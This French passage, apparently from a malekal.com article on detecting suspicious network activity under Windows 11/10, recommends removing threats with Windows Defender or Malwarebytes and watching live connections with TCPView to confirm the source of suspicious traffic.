Le guide complet :Supprimer les menaces (virus, trojan, PUA) détectées par Windows Defender

Pour renforcer la détection, vous pouvez compléter avec un outil spécialisé comme Malwarebytes.

Pour aller plus loin, vous pouvez désinfecter votre PC en suivant cette procédure : Supprimer les virus et désinfecter son PC

Contrôler les connexions actives

Utilisez un outil comme TCPView pour :

• Observer les connexions en temps réel
• Vérifier si le trafic suspect reprend
• Identifier de nouvelles IP distantes

Si l’activité cesse après la suppression ou la mise en quarantaine d’un fichier, cela confirme souvent l’origine du problème.

L’article Comment détecter une activité réseau suspecte sous Windows 11/10 est apparu en premier sur malekal.com.